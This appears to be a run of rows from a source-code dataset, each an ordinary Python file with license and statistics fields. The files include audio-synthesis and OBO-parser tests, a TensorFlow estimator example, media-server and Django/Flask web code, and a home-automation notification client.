2221,
"out",
16,
],
[
"/s_new",
"38bda0aee6d0e2d4af72be83c09d9b77",
1008,
1,
1003,
"in_",
16,
"out",
16,
],
["/g_new", 1009, 0, 1003],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1010,
0,
1009,
"frequency",
3331,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1011,
0,
1009,
"frequency",
4441,
"out",
16,
],
],
],
[
1.0,
[
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1012,
0,
1005,
"frequency",
1112,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1013,
0,
1005,
"frequency",
2222,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1014,
0,
1009,
"frequency",
3332,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1015,
0,
1009,
"frequency",
4442,
"out",
16,
],
["/n_set", 1006, "gate", 0],
["/n_set", 1007, "gate", 0],
["/n_set", 1010, "gate", 0],
["/n_set", 1011, "gate", 0],
],
],
[
2.0,
[
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1016,
0,
1005,
"frequency",
1113,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1017,
0,
1005,
"frequency",
2223,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1018,
0,
1009,
"frequency",
3333,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1019,
0,
1009,
"frequency",
4443,
"out",
16,
],
["/n_set", 1012, "gate", 0],
["/n_set", 1013, "gate", 0],
["/n_set", 1014, "gate", 0],
["/n_set", 1015, "gate", 0],
],
],
[
3.0,
[
["/n_set", 1001, "gate", 0],
["/n_set", 1016, "gate", 0],
["/n_set", 1017, "gate", 0],
["/n_set", 1018, "gate", 0],
["/n_set", 1019, "gate", 0],
],
],
[3.25, [["/n_free", 1000, 1002, 1003, 1004, 1005, 1008, 1009], [0]]],
]
assert final_offset == 3.25
def test_to_strings():
session = supriya.nonrealtime.Session()
with session.at(0):
session.inscribe(pattern)
assert session.to_strings(include_controls=True) == uqbar.strings.normalize(
"""
0.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1007 default
amplitude: 0.1, frequency: 2221.0, gate: 1.0, out: a0, pan: 0.5
1006 default
amplitude: 0.1, frequency: 1111.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: a0, out: a0
1003 group
1009 group
1011 default
amplitude: 0.1, frequency: 4441.0, gate: 1.0, out: a0, pan: 0.5
1010 default
amplitude: 0.1, frequency: 3331.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: a0, out: a0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.25, gate: 1.0, in_: a0, out: 0.0
1.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1013 default
amplitude: 0.1, frequency: 2222.0, gate: 1.0, out: a0, pan: 0.5
1012 default
amplitude: 0.1, frequency: 1112.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1015 default
amplitude: 0.1, frequency: 4442.0, gate: 1.0, out: a0, pan: 0.5
1014 default
amplitude: 0.1, frequency: 3332.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.02, gate: 1.0, in_: 16.0, out: 0.0
2.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1017 default
amplitude: 0.1, frequency: 2223.0, gate: 1.0, out: a0, pan: 0.5
1016 default
amplitude: 0.1, frequency: 1113.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1019 default
amplitude: 0.1, frequency: 4443.0, gate: 1.0, out: a0, pan: 0.5
1018 default
amplitude: 0.1, frequency: 3333.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.02, gate: 1.0, in_: 16.0, out: 0.0
3.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
3.25:
NODE TREE 0 group
"""
)
|
mit
| -7,873,358,582,196,026,000
| 31.645892
| 95
| 0.342676
| false
| 4.015331
| false
| false
| false
|
tgbugs/pyontutils
|
test/test_oboio.py
|
1
|
6002
|
import os
import shutil
import unittest
import pytest
from pyontutils import obo_io as oio
from .common import temp_path
obo_test_string = """format-version: 1.2
ontology: uberon/core
subsetdef: cumbo "CUMBO"
treat-xrefs-as-has-subclass: EV
import: http://purl.obolibrary.org/obo/uberon/chebi_import.owl
treat-xrefs-as-reverse-genus-differentia: TGMA part_of NCBITaxon:44484
[Term]
id: UBERON:0000003
xref: SCTID:272650008
relationship: in_lateral_side_of UBERON:0000033 {gci_relation="part_of", gci_filler="NCBITaxon:7776", notes="hagfish have median nostril"} ! head
!relationship: in_lateral_side_of UBERON:0000034 {gci_filler="NCBITaxon:7776", gci_relation="part_of", notes="hagfish have median nostril"} ! can't use this due to robot non-determinism
comment: robot does reorder the gci_ so that relation always comes before filler
property_value: external_definition "One of paired external openings of the nasal chamber.[AAO]" xsd:string {date_retrieved="2012-06-20", external_class="AAO:0000311", ontology="AAO", source="AAO:EJS"}
replaced_by: GO:0045202
consider: FMA:67408
[Term]
id: UBERON:0000033
name: head
comment: needed to prevent robot from throwing a null pointer on the relationship axiom above
[Term]
id: UBERON:0000034
[Typedef]
id: in_lateral_side_of
property_value: seeAlso FMA:86003
name: in_lateral_side_of
comment: id needed to prevent robot from throwing a null pointer on the relationship axiom above
comment: apparently also have to have name strangely enough and robot doesn't roundtrip random comments
is_transitive: true
"""
class TMHelper:
parse = oio.TVPair._parse_modifiers
serialize = oio.TVPair._format_trailing_modifiers
class TestOboIo(unittest.TestCase):
@classmethod
def setUpClass(cls):
if temp_path.exists():
shutil.rmtree(temp_path)
temp_path.mkdir()
@classmethod
def tearDownClass(cls):
shutil.rmtree(temp_path)
def test_parse_trailing_modifiers(self):
thm = TMHelper()
lines = (
(('relationship: part_of UBERON:0000949 '
'{source="AAO", source="FMA", source="XAO"} ! endocrine system'),
(('source', 'AAO'), ('source', 'FMA'), ('source', 'XAO'))),
('{oh="look", a="thing!"}', (('oh', 'look'), ('a', 'thing!'))),
('some randome values {oh="look", a="thing!"} ! yay!', (('oh', 'look'), ('a', 'thing!'))),
('some rando}me values {oh="l{ook", a="t{hing!"} ! yay!', (('oh', 'l{ook'), ('a', 't{hing!'))),
('some rando}me values {oh="l{ook", a="t}hing!"} ! yay!', (('oh', 'l{ook'), ('a', 't}hing!'))),
)
bads = [(expect, actual) for line, expect in lines
for _, actual in (thm.parse(line),)
if actual != expect]
assert not bads, '\n' + '\n\n'.join(f'{e}\n{a}' for e, a in bads)
def test_construct_simple_file(self):
of = oio.OboFile()
ids_names = [['123', 'test'],
['234', 'yee'],
['345', 'haw'],
['456', 'oio']]
terms = [oio.Term(id=i, name=n) for i, n in ids_names]
of.add(*terms)
str(of)
def test_header_treat_xrefs(self):
of = oio.OboFile()
test_tag = 'treat-xrefs-as-is_a'
tags_values = [
[test_tag, 'TEMP:test1'],
[test_tag, 'TEMP:test2'],
]
tvpairs = [oio.TVPair(tag=t, value=v) for t, v in tags_values]
of.header.add(*tvpairs)
tv = of.asObo()
assert len(tv.split(test_tag)) > 2, tv
def test_property_value_bug(self):
def _test(string):
pv = oio.Property_value.parse(string)
assert pv.value() == string
tv = oio.TVPair(string)
assert str(tv) == string
return pv, tv
minimal = ('property_value: any " ! " xsd:string')
pv, tv = _test(minimal)
darn = ('property_value: external_ontology_notes "see also MA:0002165 !'
' lieno-pancreatic vein" xsd:string {external_ontology="MA"}')
pv, tv = _test(darn)
ouch = ('property_value: editor_note "TODO -'
' this string breaks the parser A:0 ! wat" xsd:string')
pv, tv = _test(ouch)
hrm = ('property_value: editor_note "TODO -'
' consider relationship to UBERON:0000091 ! bilaminar disc" xsd:string')
pv, tv = _test(hrm)
def test_robot(self):
of1 = oio.OboFile(data=obo_test_string)
obo1 = of1.asObo(stamp=False)
obor1 = of1.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
of2 = oio.OboFile(data=obo1)
obo2 = of2.asObo(stamp=False)
# can't test against obor2 because obo1 reordered the trailing qualifiers
# and since there is seemingly no rational way to predict those, we simply
# preserve the ordering that we got
obor2 = of2.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
of3 = oio.OboFile(data=obor1)
obo3 = of3.asObo(stamp=False)
obor3 = of3.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
print(obo1)
print(obo2)
print(obor1)
print(obor2)
assert obo1 == obo2 == obo3 != obor1
assert obor1 == obor3
@pytest.mark.skipif(not shutil.which('robot'), reason='robot not installed')
def test_robot_rt(self):
of = oio.OboFile(data=obo_test_string)
obor1 = of.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
rtp = temp_path / 'robot-test.obo'
robot_path = temp_path / 'robot-test.test.obo'
of.write(rtp, stamp=False, version=oio.OBO_VER_ROBOT)
cmd = f'robot convert -vvv -i {rtp.as_posix()} -o {robot_path.as_posix()}'
wat = os.system(cmd)
if wat:
raise ValueError(wat)
datas = []
for path in (rtp, robot_path):
with open(path, 'rt') as f:
datas.append(f.read())
ours, rob = datas
assert ours == rob
|
mit
| -6,232,890,414,575,821,000
| 34.72619
| 201
| 0.598967
| false
| 3.077949
| true
| false
| false
|
tensorflow/model-analysis
|
tensorflow_model_analysis/eval_saved_model/example_trainers/control_dependency_estimator.py
|
1
|
6700
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exports a simple estimator with control dependencies using tf.Learn.
This is the fixed prediction estimator with extra fields, but it creates
metrics with control dependencies on the features, predictions and labels.
This is for use in tests to verify that TFMA correctly works around the
TensorFlow issue #17568.
This model always predicts the value of the "prediction" feature.
The eval_input_receiver_fn also parses the "fixed_float", "fixed_string",
"fixed_int", and "var_float", "var_string", "var_int" features.
"""
from __future__ import absolute_import
from __future__ import division
# Standard __future__ imports
from __future__ import print_function
# Standard Imports
import tensorflow as tf
from tensorflow_model_analysis.eval_saved_model import export
from tensorflow_model_analysis.eval_saved_model.example_trainers import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.estimator.canned import prediction_keys
def simple_control_dependency_estimator(export_path, eval_export_path):
"""Exports a simple estimator with control dependencies."""
def control_dependency_metric(increment, target):
"""Metric that introduces a control dependency on target.
The value is incremented by increment each time the metric is called
(so the value can vary depending on how things are batched). This is mainly
to verify that the metric was called.
Args:
increment: Amount to increment the value by each time the metric is
called.
target: Tensor to introduce the control dependency on.
Returns:
value_op, update_op for the metric.
"""
total_value = tf.compat.v1.Variable(
initial_value=0.0,
dtype=tf.float64,
trainable=False,
collections=[
tf.compat.v1.GraphKeys.METRIC_VARIABLES,
tf.compat.v1.GraphKeys.LOCAL_VARIABLES
],
validate_shape=True)
with tf.control_dependencies([target]):
update_op = tf.identity(tf.compat.v1.assign_add(total_value, increment))
value_op = tf.identity(total_value)
return value_op, update_op
def model_fn(features, labels, mode, config):
"""Model function for custom estimator."""
del config
predictions = features['prediction']
predictions_dict = {
prediction_keys.PredictionKeys.PREDICTIONS: predictions,
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions_dict,
export_outputs={
tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
tf.estimator.export.RegressionOutput(predictions)
})
loss = tf.compat.v1.losses.mean_squared_error(predictions,
labels['actual_label'])
train_op = tf.compat.v1.assign_add(tf.compat.v1.train.get_global_step(), 1)
eval_metric_ops = {}
if mode == tf.estimator.ModeKeys.EVAL:
eval_metric_ops = {
metric_keys.MetricKeys.LOSS_MEAN:
tf.compat.v1.metrics.mean(loss),
'control_dependency_on_fixed_float':
control_dependency_metric(1.0, features['fixed_float']),
# Introduce a direct dependency on the values Tensor. If we
# introduce another intervening op like sparse_tensor_to_dense then
# regardless of whether TFMA correctly wrap SparseTensors we will not
# encounter the TF bug.
'control_dependency_on_var_float':
control_dependency_metric(10.0, features['var_float'].values),
'control_dependency_on_actual_label':
control_dependency_metric(100.0, labels['actual_label']),
'control_dependency_on_var_int_label':
control_dependency_metric(1000.0, labels['var_int'].values),
# Note that TFMA does *not* wrap predictions, so in most cases
# if there's a control dependency on predictions they will be
# recomputed.
'control_dependency_on_prediction':
control_dependency_metric(10000.0, predictions),
}
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
predictions=predictions_dict,
eval_metric_ops=eval_metric_ops)
def train_input_fn():
"""Train input function."""
return {
'prediction': tf.constant([[1.0], [2.0], [3.0], [4.0]]),
}, {
'actual_label': tf.constant([[1.0], [2.0], [3.0], [4.0]])
}
feature_spec = {'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32)}
eval_feature_spec = {
'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32),
'label': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_float': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_string': tf.io.FixedLenFeature([1], dtype=tf.string),
'fixed_int': tf.io.FixedLenFeature([1], dtype=tf.int64),
'var_float': tf.io.VarLenFeature(dtype=tf.float32),
'var_string': tf.io.VarLenFeature(dtype=tf.string),
'var_int': tf.io.VarLenFeature(dtype=tf.int64),
}
estimator = tf.estimator.Estimator(model_fn=model_fn)
estimator.train(input_fn=train_input_fn, steps=1)
def eval_input_receiver_fn():
"""An input_fn that expects a serialized tf.Example."""
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
features = tf.io.parse_example(
serialized=serialized_tf_example, features=eval_feature_spec)
labels = {'actual_label': features['label'], 'var_int': features['var_int']}
return export.EvalInputReceiver(
features=features,
labels=labels,
receiver_tensors={'examples': serialized_tf_example})
return util.export_model_and_eval_model(
estimator=estimator,
serving_input_receiver_fn=(
tf.estimator.export.build_parsing_serving_input_receiver_fn(
feature_spec)),
eval_input_receiver_fn=eval_input_receiver_fn,
export_path=export_path,
eval_export_path=eval_export_path)
|
apache-2.0
| -6,121,643,079,959,225,000
| 38.64497
| 80
| 0.673134
| false
| 3.893085
| false
| false
| false
|
pedro2d10/SickRage-FR
|
sickbeard/notifiers/emby.py
|
1
|
4193
|
# coding=utf-8
# Author: Nic Wolfe <nic@wolfeden.ca>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import urllib
import urllib2
import sickbeard
from sickbeard import logger
from sickrage.helper.exceptions import ex
try:
import json
except ImportError:
import simplejson as json
class Notifier(object):
def _notify_emby(self, message, host=None, emby_apikey=None):
"""Handles notifying Emby host via HTTP API
Returns:
Returns True for no issue or False if there was an error
"""
# fill in omitted parameters
if not host:
host = sickbeard.EMBY_HOST
if not emby_apikey:
emby_apikey = sickbeard.EMBY_APIKEY
url = 'http://%s/emby/Notifications/Admin' % host
values = {'Name': 'SickRage', 'Description': message, 'ImageUrl': 'https://raw.githubusercontent.com/SickRage/SickRage/master/gui/slick/images/sickrage-shark-mascot.png'}
data = json.dumps(values)
try:
req = urllib2.Request(url, data)
req.add_header('X-MediaBrowser-Token', emby_apikey)
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req)
result = response.read()
response.close()
logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG)
return True
except (urllib2.URLError, IOError) as e:
logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING)
return False
##############################################################################
# Public functions
##############################################################################
def test_notify(self, host, emby_apikey):
return self._notify_emby('This is a test notification from SickRage', host, emby_apikey)
def update_library(self, show=None):
"""Handles updating the Emby Media Server host via HTTP API
Returns:
Returns True for no issue or False if there was an error
"""
if sickbeard.USE_EMBY:
if not sickbeard.EMBY_HOST:
logger.log(u'EMBY: No host specified, check your settings', logger.DEBUG)
return False
if show:
if show.indexer == 1:
provider = 'tvdb'
elif show.indexer == 2:
logger.log(u'EMBY: TVRage Provider no longer valid', logger.WARNING)
return False
else:
logger.log(u'EMBY: Provider unknown', logger.WARNING)
return False
query = '?%sid=%s' % (provider, show.indexerid)
else:
query = ''
url = 'http://%s/emby/Library/Series/Updated%s' % (sickbeard.EMBY_HOST, query)
values = {}
data = urllib.urlencode(values)
try:
req = urllib2.Request(url, data)
req.add_header('X-MediaBrowser-Token', sickbeard.EMBY_APIKEY)
response = urllib2.urlopen(req)
result = response.read()
response.close()
logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG)
return True
except (urllib2.URLError, IOError) as e:
logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING)
return False
|
gpl-3.0
| -1,720,672,605,901,913,900
| 33.652893
| 178
| 0.576198
| false
| 4.151485
| false
| false
| false
|
CyberTaoFlow/scirius
|
scirius/settings.py
|
1
|
4444
|
"""
Django settings for scirius project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from distutils.version import LooseVersion
from django import get_version
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'p8o5%vq))8h2li08c%k3id(wwo*u(^dbdmx2tv#t(tb2pr9@n-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_tables2',
'bootstrap3',
'rules',
'suricata',
'accounts',
)
if LooseVersion(get_version()) < LooseVersion('1.7'):
INSTALLED_APPS += ('south', )
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'scirius.loginrequired.LoginRequiredMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.request',
'django.contrib.auth.context_processors.auth'
)
ROOT_URLCONF = 'scirius.urls'
WSGI_APPLICATION = 'scirius.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
# Suricata binary
SURICATA_BINARY = "suricata"
# Elastic search
USE_ELASTICSEARCH = True
#ELASTICSEARCH_ADDRESS = "127.0.0.1:9200"
ELASTICSEARCH_ADDRESS = "localhost:9200"
# You can use a star to avoid timestamping expansion for example 'logstash-*'
ELASTICSEARCH_LOGSTASH_INDEX = "logstash-"
# use hourly, daily to indicate the logstash index building recurrence
ELASTICSEARCH_LOGSTASH_TIMESTAMPING = "daily"
# Kibana
USE_KIBANA = False
# Use django as a reverse proxy for kibana request
# This will allow you to use scirius authentication to control
# access to Kibana
KIBANA_PROXY = False
# Kibana URL
KIBANA_URL = "http://localhost:9292"
# Kibana index name
KIBANA_INDEX = "kibana-int"
# Kibana version
KIBANA_VERSION=3
# Number of dashboards to display
KIBANA_DASHBOARDS_COUNT = 20
# Suricata is configured to write stats to EVE
USE_SURICATA_STATS = False
# Logstash is generating metrics on eve events
USE_LOGSTASH_STATS = False
# Influxdb
USE_INFLUXDB = False
INFLUXDB_HOST = "localhost"
INFLUXDB_PORT = 8086
INFLUXDB_USER = "grafana"
INFLUXDB_PASSWORD = "grafana"
INFLUXDB_DATABASE = "scirius"
# Proxy parameters
# Set USE_PROXY to True to use a proxy to fetch ruleset update.
# PROXY_PARAMS contains the proxy parameters.
# If user is set in PROXY_PARAMS then basic authentication will
# be used.
USE_PROXY = False
PROXY_PARAMS = { 'http': "http://proxy:3128", 'https': "http://proxy:3128" }
# For basic authentication you can use
# PROXY_PARAMS = { 'http': "http://user:pass@proxy:3128", 'https': "http://user:pass@proxy:3128" }
GIT_SOURCES_BASE_DIRECTORY = os.path.join(BASE_DIR, 'git-sources/')
# Ruleset generator framework
RULESET_MIDDLEWARE = 'suricata'
LOGIN_URL = '/accounts/login/'
try:
from local_settings import *
except:
pass
if KIBANA_PROXY:
INSTALLED_APPS += ( 'revproxy',)
|
gpl-3.0
| -3,509,663,828,025,243,000
| 24.988304
| 98
| 0.726373
| false
| 3.129577
| false
| false
| false
|
bt3gl/Neat-Problems-in-Python-and-Flask
|
USEFUL/snippets_and_examples_Flask/example_password_reset/app/auth/views.py
|
1
|
4889
|
from flask import render_template, redirect, request, url_for, flash
from flask.ext.login import login_user, logout_user, login_required, \
current_user
from . import auth
from .. import db
from ..models import User
from ..email import send_email
from .forms import LoginForm, RegistrationForm, ChangePasswordForm,\
PasswordResetRequestForm, PasswordResetForm
@auth.before_app_request
def before_request():
if current_user.is_authenticated() \
and not current_user.confirmed \
and request.endpoint[:5] != 'auth.':
return redirect(url_for('auth.unconfirmed'))
@auth.route('/unconfirmed')
def unconfirmed():
if current_user.is_anonymous() or current_user.confirmed:
return redirect(url_for('main.index'))
return render_template('auth/unconfirmed.html')
@auth.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is not None and user.verify_password(form.password.data):
login_user(user, form.remember_me.data)
return redirect(request.args.get('next') or url_for('main.index'))
flash('Invalid username or password.')
return render_template('auth/login.html', form=form)
@auth.route('/logout')
@login_required
def logout():
logout_user()
flash('You have been logged out.')
return redirect(url_for('main.index'))
@auth.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(email=form.email.data,
username=form.username.data,
password=form.password.data)
db.session.add(user)
db.session.commit()
token = user.generate_confirmation_token()
send_email(user.email, 'Confirm Your Account',
'auth/email/confirm', user=user, token=token)
flash('A confirmation email has been sent to you by email.')
return redirect(url_for('auth.login'))
return render_template('auth/register.html', form=form)
@auth.route('/confirm/<token>')
@login_required
def confirm(token):
if current_user.confirmed:
return redirect(url_for('main.index'))
if current_user.confirm(token):
flash('You have confirmed your account. Thanks!')
else:
flash('The confirmation link is invalid or has expired.')
return redirect(url_for('main.index'))
@auth.route('/confirm')
@login_required
def resend_confirmation():
token = current_user.generate_confirmation_token()
send_email(current_user.email, 'Confirm Your Account',
'auth/email/confirm', user=current_user, token=token)
flash('A new confirmation email has been sent to you by email.')
return redirect(url_for('main.index'))
@auth.route('/change-password', methods=['GET', 'POST'])
@login_required
def change_password():
form = ChangePasswordForm()
if form.validate_on_submit():
if current_user.verify_password(form.old_password.data):
current_user.password = form.password.data
db.session.add(current_user)
flash('Your password has been updated.')
return redirect(url_for('main.index'))
else:
flash('Invalid password.')
return render_template("auth/change_password.html", form=form)
@auth.route('/reset', methods=['GET', 'POST'])
def password_reset_request():
if not current_user.is_anonymous():
return redirect(url_for('main.index'))
form = PasswordResetRequestForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user:
token = user.generate_reset_token()
send_email(user.email, 'Reset Your Password',
'auth/email/reset_password',
user=user, token=token,
next=request.args.get('next'))
flash('An email with instructions to reset your password has been '
'sent to you.')
return redirect(url_for('auth.login'))
return render_template('auth/reset_password.html', form=form)
@auth.route('/reset/<token>', methods=['GET', 'POST'])
def password_reset(token):
if not current_user.is_anonymous():
return redirect(url_for('main.index'))
form = PasswordResetForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is None:
return redirect(url_for('main.index'))
if user.reset_password(token, form.password.data):
flash('Your password has been updated.')
return redirect(url_for('auth.login'))
else:
return redirect(url_for('main.index'))
return render_template('auth/reset_password.html', form=form)
|
mit
| -1,030,766,068,768,395,900
| 35.485075
| 78
| 0.644713
| false
| 3.923756
| false
| false
| false
|
meahmadi/nsun
|
server.py
|
1
|
2333
|
import web
import traceback
import webbrowser
from web.contrib import template
import os
import json
from datetime import datetime
#from ir.idehgostar.modir.assistant.mind import Mind
from ir.ac.iust.me_ahmadi.multiProcessMind.mind import Mind
render = template.render_genshi(['./templates/'])
urls = (
'/(.*)', 'Assistant'
)
class MyApplication(web.application):
def run(self, port=12010, *middleware):
func = self.wsgifunc(*middleware)
return web.httpserver.runsimple(func, ('0.0.0.0', port))
app = MyApplication(urls, globals())
outbuffer = []
history = []
def getMindOutput(action,args):
Assistant.outbuffer.append([action,args])
def flushOutput():
t = []
t = Assistant.outbuffer
Assistant.outbuffer = []
Assistant.history += t
return t
Mind.singleton(getMindOutput)
class Assistant:
outbuffer = []
history = []
def __init__(self):
pass
def GET(self,name):
print "GET "+name
if not name:
return render.index(root="static");
def OPTIONS(self,args):
web.header('Access-Control-Allow-Origin', '*')
web.header('Access-Control-Allow-Credentials', 'true')
web.header('Access-Control-Allow-Headers','Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token')
def POST(self,action):
if not action:
return '';
web.header('Access-Control-Allow-Origin', '*')
web.header('Access-Control-Allow-Credentials', 'true')
web.header('Access-Control-Allow-Headers','Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token')
data = web.data()
data_dict = {}
try:
data_dict = json.loads(data)
except Exception, e:
print "error parsing json:"+ str(e)
pass
if action=="message":
mind = Mind.singleton(getMindOutput)
try:
for line in data_dict["body"].splitlines():
print line
mind.listen(line)
except Exception as e:
print "Error:"+str(e)
results = []
for output in flushOutput():
results.append({'data': output[1],'action':output[0]})
return json.dumps(results)
if action=="update":
results = []
for output in flushOutput():
results.append({'data': output[1],'action':output[0]})
return json.dumps(results)
else:
return "[]"
if __name__ == "__main__":
print "See: localhost:12010 in browser"
webbrowser.get().open('http://localhost:12010/')
app.run(port=12010)
|
gpl-2.0
| -8,180,544,014,247,534,000
| 24.086022
| 109
| 0.672953
| false
| 3.065703
| false
| false
| false
|
guh/guh-cli
|
nymea/notifications.py
|
1
|
3045
|
# -*- coding: UTF-8 -*-
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# Copyright (C) 2015 - 2018 Simon Stuerz <simon.stuerz@guh.io> #
# #
# This file is part of nymea-cli. #
# #
# nymea-cli is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, version 2 of the License. #
# #
# nymea-cli is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with nymea-cli. If not, see <http://www.gnu.org/licenses/>. #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import sys
import socket
import json
import select
import telnetlib
import nymea
def notification_sniffer(nymeaHost, nymeaPort):
global commandId
commandId = 0
print "Connecting notification handler..."
try:
tn = telnetlib.Telnet(nymeaHost, nymeaPort)
except :
print "ERROR: notification socket could not connect the to nymea-server. \n"
return None
print "...OK \n"
#enable_notification(notificationSocket)
enable_notification(tn.get_socket())
try:
x = None
while (x !=ord('\n') and x != 27):
socket_list = [sys.stdin, tn.get_socket()]
read_sockets, write_sockets, error_sockets = select.select(socket_list , [], [])
for sock in read_sockets:
# notification messages:
if sock == tn.get_socket():
packet = tn.read_until("}\n")
packet = json.loads(packet)
nymea.print_json_format(packet)
elif sock == sys.stdin:
x = sys.stdin.readline()
return None
finally:
tn.close()
print "Notification socket closed."
